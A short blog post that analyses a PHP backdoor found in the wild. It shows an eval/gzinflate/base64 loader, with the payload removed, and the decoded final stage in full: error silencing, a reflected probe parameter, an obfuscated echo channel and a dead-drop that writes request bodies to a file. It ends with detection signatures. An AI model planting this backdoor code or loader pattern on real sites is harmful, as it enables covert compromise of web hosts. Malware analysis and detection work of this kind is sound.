
Kim Gert Nielsen

 

PHP backdoor

Found this little thing on Facebook tonight (an obfuscated `eval(gzinflate(base64_decode(...)))` loader):

    <?php
    // Loader stage: base64-decode the blob, gzinflate it, then eval() the result.
    // The decode-then-eval chain executes whatever the packed string contains, so the
    // visible code tells you nothing about the real behaviour until it is unpacked.
    // The literal string "eval(gzinflate(base64_decode(" is a reliable grep/YARA signature
    // for this loader family. (The encoded payload itself is not reproduced in this listing.)
    eval(gzinflate(base64_decode("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"))); ?>

After repeatedly unpacking the nested decode-and-eval layers (the payload is wrapped many times over), the final stage turns out to be:

    <?
    // Decoded final stage, annotated for analysis. Code tokens are unchanged from the sample;
    // only comments and line breaks were added. Three request-driven branches, then exit.
    //
    // Stage 0: silence every error channel (runtime reporting, display, logging, log path) so
    // failed calls below leave nothing in the web server or PHP error logs.
    @error_reporting(0);
    @ini_set("display_errors",0);
    @ini_set("log_errors",0);
    @ini_set("error_log",0);
    if (isset($_GET['r'])) {
        // Branch 1: echo the raw `r` query parameter back unescaped.
        // Acts as a liveness / fingerprint probe for the operator (send a marker, expect it back);
        // it is also a trivial reflected XSS on the infected host.
        print $_GET['r'];
    } elseif (isset($_POST['e'])) {
        // Branch 2: decode POST field `e` through rot13 -> base64 -> strrev -> rot13 -> base64
        // and print the plaintext. In this sample the result is only printed, not passed to
        // eval()/system(), so this is an obfuscated echo channel rather than direct code execution.
        print(base64_decode(str_rot13(strrev(base64_decode(str_rot13($_POST['e']))))));
    } elseif (isset($_SERVER['HTTP_CONTENT_ENCODING']) && $_SERVER['HTTP_CONTENT_ENCODING'] == 'binary') {
        // Branch 3: triggered by a request carrying the header "Content-Encoding: binary".
        // "binary" is not a standard content-coding, which makes this header value a
        // useful detection signature in access logs / WAF rules.
        $data = file_get_contents('php://input');
        // Any non-empty body is acknowledged; the literal 'STATUS-IMPORT-OK' is another IOC.
        if (strlen($data) > 0) print 'STATUS-IMPORT-OK';
        // Bodies longer than 12 bytes are appended, base64-encoded and tagged with the client IP,
        // to the relative path 'tmpfile' (resolved against the script's working directory) -
        // i.e. a dead-drop for data staged on the compromised host. Exclusive lock guards
        // concurrent writers; every failure is suppressed with @.
        if (strlen($data) > 12) {
            $fp=@fopen('tmpfile','a');
            @flock($fp, LOCK_EX);
            @fputs($fp, $_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");
            @flock($fp, LOCK_UN);
            @fclose($fp);
        }
    }
    // Unconditional exit: the handler never falls through to any host page content.
    exit;?>

a backdoor: all error reporting is silenced, a `?r=` parameter is reflected back as a liveness probe, a POST field `e` is run through an obfuscated decode chain and printed, and any request with `Content-Encoding: binary` gets its body appended (base64-encoded, tagged with the client IP) to a file named `tmpfile` as a dead-drop. If you find this on a host, grep for `eval(gzinflate(base64_decode(` and check the logs for `Content-Encoding: binary` requests and the `STATUS-IMPORT-OK` response string.